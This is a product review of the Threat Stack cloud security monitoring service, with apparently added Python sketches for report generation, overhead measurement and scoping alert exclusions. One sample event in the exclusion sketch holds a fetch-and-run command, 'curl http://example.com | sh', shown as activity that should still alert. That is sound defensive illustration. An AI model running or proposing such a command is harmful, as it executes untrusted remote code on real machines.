Our primary use case is security.
It provides the security team with visibility into parts of the organization that were otherwise difficult to see. By installing the agent, we gained visibility into parts of our infrastructure that we previously couldn't access or see.
The solution gives us actionable insights into our cloud infrastructure and a lot of visibility into what's happening in our AWS accounts. The security team can monitor and provide oversight to the cloud operations team. For example, when new security groups are created, or ingress and egress points are opened at the network layer, we can ensure that they've been documented, tested, and approved, and that they have gone through change-control management. Those are the kinds of things required for compliance purposes. We can detect those changes and then ensure the controls are in place to close the loop on the change-control management process.
We developed a SecOps program around this solution. We're using it to establish some of the controls for our SOC 2 audit and our control environment, as well as for PCI.
It is a fantastic tool that gives us a level of comfort knowing that there is not only something that's watching, something that can alert and detect, but also knowing that there's an outsourced operation center that can be an auxiliary part of our security team. That is super-helpful. Having their experience in the Amazon Web Services environment is really great because most of our operations are in Amazon Web Services.
We like the host security module's ability to monitor the processes running on our servers, which helps us keep track of activity. We want to make sure that there are no bad people on our machines, and it can detect those bad people or bad processes.
The rules are really great. They give us more visibility into, and control over, what's being triggered. A large set of rules comes out-of-the-box, and we can customize them and create our own based on the traffic patterns we see. The rules did take quite a bit of customization and configuration right off the bat, because the way we release our code and products creates a significant amount of noise. The real security signal would have been lost in all that noise, so we had to customize the rules fairly significantly to filter it out.
The user interface can be a little clunky at times, and I'm not 100 percent happy with it. We maintain multiple sites, a pre-production site and a production site, in different parts of our business. I find myself switching between those sites fairly frequently and I lose track of where I am: Am I in the pre-production account or the production account? Sometimes that's a little discouraging. There's a lot of information to wade through, and the UI just isn't great. They do have a great API, though, and in many cases we've used it as a replacement for the UI.
The reports aren't very good. We've automated the report generation via the API and replaced almost all the reports that they generate for us using API calls instead.
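The review doesn't say what those API-driven reports contain. The Python below is a rough sketch only. It assumes the alerts have already been fetched from the API into records with hypothetical fields (`severity`, `rule_name`, `host`) and uses a hypothetical severity scale. It makes no calls to the actual Threat Stack API, whose endpoints and field names aren't covered here. It rolls the alerts up into the kind of plain-text summary that could go out in a daily email.

```python
from collections import Counter
from dataclasses import dataclass


@dataclass
class Alert:
    # Hypothetical alert shape; the real API's field names may differ.
    severity: int  # assumed scale: 1 = high, 2 = medium, 3 = low
    rule_name: str
    host: str


def summarize(alerts: list[Alert], top_n: int = 3) -> dict:
    """Roll already-fetched alerts up into daily-report totals."""
    by_severity = Counter(a.severity for a in alerts)
    by_rule = Counter(a.rule_name for a in alerts)
    return {
        "total": len(alerts),
        "high": by_severity.get(1, 0),
        "medium": by_severity.get(2, 0),
        "low": by_severity.get(3, 0),
        # Most frequently triggered rules, as (rule_name, count) pairs.
        "top_rules": by_rule.most_common(top_n),
        "hosts": sorted({a.host for a in alerts}),
    }


def render(summary: dict) -> str:
    """Format the summary as plain text suitable for an email body."""
    lines = [
        f"Total alerts: {summary['total']}",
        f"High: {summary['high']}  Medium: {summary['medium']}  Low: {summary['low']}",
        "Top rules:",
    ]
    lines += [f"  {name}: {count}" for name, count in summary["top_rules"]]
    lines.append(f"Hosts affected: {len(summary['hosts'])}")
    return "\n".join(lines)


if __name__ == "__main__":
    sample = [
        Alert(1, "Unexpected outbound connection", "web-1"),
        Alert(3, "Package installed", "web-1"),
        Alert(3, "Package installed", "web-2"),
    ]
    print(render(summarize(sample)))
```

The fetch step and the summarizing step are kept separate. That way the report logic can be tested against sample records without API credentials.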
It has been fairly stable. We've had a few cases where we knocked it over ourselves, but the software itself has been fairly stable.
We haven't had any scalability issues. It has been horizontally scalable for us and they seem to be able to handle our traffic. Our traffic patterns are fairly spiky, and even during high spikes they haven't seemed to be holding us back at all.
The technical support is excellent. We email them very frequently. I don't know what they would call this level of support, but it's like post-sales support. We have a technical account representative, and we email this individual very frequently about issues we're having: rule configuration, how to do X, Y, and Z. Once in a while, they'll escalate an issue to tech support, and in those cases tech support has been super-helpful as well. The two issues that have been escalated to tech support were handled really quickly and really professionally.
We previously used basic auditd, an open-source auditing framework for Linux. The main reason for switching to Threat Stack is that, while Threat Stack effectively does what auditd does, it puts a user interface around it. It gives you a way to view, store, and search the data, an API around the information, and the ability to put controls and best practices around your AWS account. With auditd the capability is there, but you have to do a lot of heavy lifting on your own. With a very small security team and limited resources, switching made a lot of sense for us economically.
It was a little tricky to bootstrap and took some time to get started. Once we did get started, it leveled off really quickly.
There are two parts to the setup: the setup of the agent and the setup of the Amazon Web Services monitoring. The AWS monitoring part was really easy, and our operations team found it straightforward. They simply ran a CloudFormation stack.
The installation of the agent was also fairly simple. However, it still means installing software into a production environment, and that makes operations teams nervous about stability and performance. Is it going to degrade performance? Will it cause instability? We went through significant performance testing and load testing, and we actually had to work with their installation teams to tune the configurations to match our performance needs.
Out-of-the-box, performance degradation was somewhere north of 15 percent and we had to make changes to the rules to get it down to around three percent performance loss.
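The review doesn't say which metric those percentages were measured on. The Python below is a minimal sketch of the overhead calculation. It assumes latency samples taken from comparable load-test runs, one set without the agent and one with it. It also checks the result against a target budget. The 3.0 default is an assumption that simply mirrors the figure quoted above.

```python
from statistics import mean


def overhead_percent(baseline: list[float], with_agent: list[float]) -> float:
    """Percentage increase in mean latency after installing the agent.

    Both lists are assumed to hold latency samples (e.g. milliseconds per
    request) from comparable load-test runs; higher latency is worse.
    """
    base = mean(baseline)
    return 100.0 * (mean(with_agent) - base) / base


def within_budget(overhead: float, limit: float = 3.0) -> bool:
    """True if the measured overhead is at or under the assumed target."""
    return overhead <= limit


if __name__ == "__main__":
    before = [200.0, 198.0, 202.0]  # illustrative numbers, not measured data
    after = [206.0, 204.0, 208.0]
    pct = overhead_percent(before, after)
    print(f"overhead: {pct:.1f}% (within budget: {within_budget(pct)})")
```

For example, a mean latency that rises from 200 ms to 206 ms is a 3 percent overhead. If throughput were measured instead of latency, you would compute the drop relative to the baseline, since lower throughput is worse.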
The installation was actually fairly easy, but getting to the point where we could actually install and deploy broadly took us a little bit of time.
Our deployment took four to six weeks.
The implementation strategy took into account that we have multiple accounts: a pre-production account and a production account. We did all of the initial testing in the pre-production account, running the service against our pre-production Amazon Web Services account. We also installed it on some local Amazon instances to see what would happen, and then worked with their team to assess the performance.
We then tuned and tweaked the rules and started working on a production strategy, which meant installing onto hundreds and hundreds of EC2 instances. Again, we started off fairly slowly, installing onto one instance, measuring and monitoring the performance degradation, and working with them to resolve it. We then did the production operations build-out through the operations flows. They did all that work and then we turned it on.
Once all that was on and enabled, we started to tweak the rule set, which took another two to three weeks of fairly solid work. Because of the way we deploy our software, a lot of shell scripts, shell commands, and privilege escalations run to get the software onto servers. Excluding all of that from the findings took quite a while.
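The review doesn't describe Threat Stack's actual rule syntax, so the Python below is only a generic sketch of the idea. It suppresses process events that match known deployment activity, but only when they come from the expected account. The `Event` and `Exclusion` types, the `deploy` user, and the command patterns are all hypothetical.

```python
from dataclasses import dataclass
from fnmatch import fnmatchcase


@dataclass(frozen=True)
class Event:
    # Hypothetical process event; not Threat Stack's actual schema.
    user: str
    command: str


@dataclass(frozen=True)
class Exclusion:
    # An event is suppressed only when BOTH the user and the command
    # pattern match, so the same command run by anyone else still alerts.
    user: str
    command_glob: str


# Hypothetical patterns for a shell-script-driven deploy pipeline.
DEPLOY_EXCLUSIONS = [
    Exclusion("deploy", "/opt/deploy/*.sh*"),
    Exclusion("deploy", "sudo systemctl restart app*"),
]


def is_excluded(event: Event, exclusions: list[Exclusion]) -> bool:
    """True if any exclusion covers this event (case-sensitive glob match)."""
    return any(
        event.user == ex.user and fnmatchcase(event.command, ex.command_glob)
        for ex in exclusions
    )


def findings(events: list[Event], exclusions: list[Exclusion]) -> list[Event]:
    """Return only the events that no exclusion covers."""
    return [e for e in events if not is_excluded(e, exclusions)]


if __name__ == "__main__":
    events = [
        Event("deploy", "/opt/deploy/release.sh --env prod"),  # suppressed
        Event("alice", "/opt/deploy/release.sh"),  # kept: wrong user
        Event("deploy", "curl http://example.com | sh"),  # kept: no pattern
    ]
    for e in findings(events, DEPLOY_EXCLUSIONS):
        print(e)
```

Each exclusion is scoped to a user as well as a command pattern, and that is a deliberate choice. A broad pattern like `*.sh*` on its own would also hide a script run by an attacker, which is exactly the signal the tuning is meant to preserve.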
The tuning process did take time, and the way you deploy software will affect how much tuning you need to do. For example, if you have an immutable Kubernetes cluster, you very likely won't have to do any tuning at all, because nothing of an abnormal nature should be running. Anything Threat Stack detects happening in that cluster would be abnormal, and it will report those things, which you want to know about as soon as possible. Our environment isn't immutable like that. We have these servers, we deploy new code onto them, and there are a lot of moving parts, so Threat Stack is detecting and responding to all of those moving parts. We have to build filters for them into the rules; otherwise, the rules just become useless.
We did it internally.
I don't know that there's an ROI. We purchased a product that includes oversight from an operations center, so we're basically replacing some FTE-equivalent in that budget pool. In security products there's never really an ROI, although preventing one breach is a return on investment in itself.
I'm happy with the amount that we spend for the product that we get and the overall service that we get. It's not cheap, but I'm still happy with the spend.
We didn't evaluate too many other options. I had been talking to the Threat Stack team for some time and had known about the product, its features and functionality. We decided to jump in and make a purchase fairly quickly.
Understand the types of users and behaviors that you have in your environment and whether it's changing all the time or very static. If it's a highly static environment, Threat Stack can be a very easy-to-use, drop-in solution that is going to give you peace of mind. If it is a more complex environment that has a lot of moving parts with a lot of systems administrators logging on and running commands all day and all night, it's going to take you a little bit of time to tune the system to the point where you know what the baseline of activity is so that you know what the malicious behavior might be. So plan on having a little bit of time built into your schedule for that.
We're using their SaaS service. We haven't yet used the solution's ability to send alerts and data to third-party tools (via APIs and export into S3 buckets), but it is something we're actively looking to do. The same goes for the container and Kubernetes monitoring.
In terms of MTTR, that wasn't the reason for the purchase of this product. The purchase of this product was to get visibility into all the different systems that we have and to know if and when we're being compromised. It wasn't to provide a lower MTTR.
It has probably increased the time to investigate potential attacks, in a somewhat perverse way, because we're actually investigating more stuff than we had before. We're taking a look at more items than we did before, so we're doing more work. By doing that, we're still on the up-slope of the learning curve and we haven't quite leveled off yet. I think that it will eventually level out.
There aren't many people using the solution day-to-day. We have three or four security operators using it daily, looking at the alerts coming through. The operations team is basically waiting for us to tell them if there are any issues, so it's really just the security team looking at it. Deployment and maintenance were tasks that someone handled and then moved on from to do other things. Nobody works on this full-time or sits at the screen all day, every day. We use it when high-severity alerts come through.
We get automated daily reports from the system. We review those via email and that's about it. We're not in the tool poking around very often. It's silently doing its thing in the background.
The product is being used across the enterprise, pretty much everywhere. Across our flagship product and all the different acquisitions we've made, it's deployed on everything except one small pocket. Once we have some operations resources free to install it there, it'll be fully deployed everywhere.
This product is a solid eight out of ten. The basic core functionality is exceptional, and I have a lot of faith and trust in it. The performance is good for what it does, meaning it doesn't degrade performance more than I would expect given the types of things it's expected to do. The only things pulling it down from a ten are the user interface and the reporting, which are a little bit weak. There's some room for it to grow and get better, but otherwise I think it's a pretty solid product.